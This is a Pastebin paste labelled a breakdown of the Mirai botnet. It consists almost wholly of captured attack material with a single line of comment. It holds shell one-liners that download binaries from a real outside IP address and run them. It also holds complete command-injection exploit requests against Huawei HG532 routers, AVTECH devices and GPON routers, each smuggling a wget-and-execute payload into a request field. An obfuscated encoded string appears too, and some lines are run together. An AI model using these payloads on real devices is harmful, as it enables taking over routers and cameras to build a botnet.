API tools faq
paste
Advertisement
Guest User

Mirai Botnet

a guest
Oct 31st, 2018
355
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.21 KB | None | 0 0
raw download clone embed print report
  1. BREAKDOWN OF THE MIRAI BotNet:
  2. -- Oct 31st, 2018
  3.  
  4. Is it ofsec fail ?--> d4rka
  5.  
  6. cd /tmp; wget hxxp://209.141.33.119/bins/dark.arm7 -O d4rka; chmod 777 d4rka; ./d4rka avtech; rm -rf d4rka
  7. cd /tmp; wget hxxp://209.141.33.119/bins/dark.arm -O d4rkb; chmod 777 d4rkb; ./d4rkb avtech; rm -rf d4rkb
  8.  
  9. cd /tmp; wget hxxp://209.141.33.119/xpl/gpon.arm7 -O d4rka; chmod 777 d4rka; ./d4rka gpon_armv7l; rm -rf d4rka
  10. cd /tmp; wget hxxp://209.141.33.119/xpl/gpon.arm -O d4rkb; chmod 777 d4rkb; ./d4rkb gpon_armv4l; rm -rf d4rkb
  11.  
  12. POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
  13. Content-Length: 430
  14. Connection: keep-alive
  15. Accept: */*
  16. Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
  17. <?xml version="1.0"?>
  18. <s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/">
  19. <s:Body>
  20. <u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
  21. <NewStatusURL>$(/bin/busybox wget -g 209.141.33.119 -l /tmp/ankitxd -r /huawei; /bin/busybox chmod 777 * /tmp/ankitxd; /tmp/ankitxd huawei)</NewStatusURL>
  22. <NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>
  23. </u:Upgrade>
  24. </s:Body>
  25. </s:Envelope>
  26.  
  27. hxxp://209.141.33.119/avtechsh
  28. hxxp://209.141.33.119/gponsh
  29.  
  30. huagoagpoGET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin HTTP/1.1
  31. User-Agent: Dark
  32. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  33. Accept-Language: en-GB,en;q=0.5
  34. Accept-Encoding: gzip, deflate
  35. Connection: close
  36.  
  37.  
  38. GET / HTTP/1.1POST /GponForm/diag_Form?images/ HTTP/1.1
  39. User-Agent: Dark
  40. Accept: */*
  41. Accept-Encoding: gzip, deflate
  42. Content-Type: application/x-www-form-urlencoded
  43.  
  44. XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://209.141.33.119/gponsh+-O+/tmp/d4rk;sh+/tmp/d4rk`&ipv=0gjg*`evomkp*jap tvk|}tmta*gki+tvkg++a|a+b`+wpepqw+tvkg+jap+pgtwlahhajefhaw}wpaiwlfelwpevphmjq|wlahh+fmj+fqw}fk|$@EVO@EVO>$etthap$jkp$bkqj`jgkvvagpkcmjewwskv`ajpav+`ar+sepgl`kc+`ar+imwg+sepgl`kc+wfmj+sepgl`kc+fmj+sepgl`kc+`ar+BPS@P545[sepgl`kc+`ar+BPS@P545+sepgl`kc+`ar+sepgl`kc4+apg+`abeqhp+sepgl`kc+apg+sepgl`kc@EVO`kcapg?/dev/null
  45.  
  46. ########
  47. #SHELL:#
  48. ########
  49. wget -g 209.141.33.119 -l /tmp/ankitxd -r /huawei;
  50. /bin/busybox chmod 777 * /tmp/ankitxd;
  51. /tmp/ankitxd huawei)
  52. </NewStatusURL>
  53. <NewDownloadURL>
  54. $(echo HUAWEIUPNP)
  55. </NewDownloadURL>
  56. </u:Upgrade>
  57. </s:Body>
  58. </s:Envelope>
  59.  
  60. ########
  61. #:HTTP:#
  62. ########
  63. GET / HTTP/1.1
  64. GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin HTTP/1.1
  65. POST /GponForm/diag_Form?images/ HTTP/1.1
  66. POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
  67. User-Agent: Dark
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!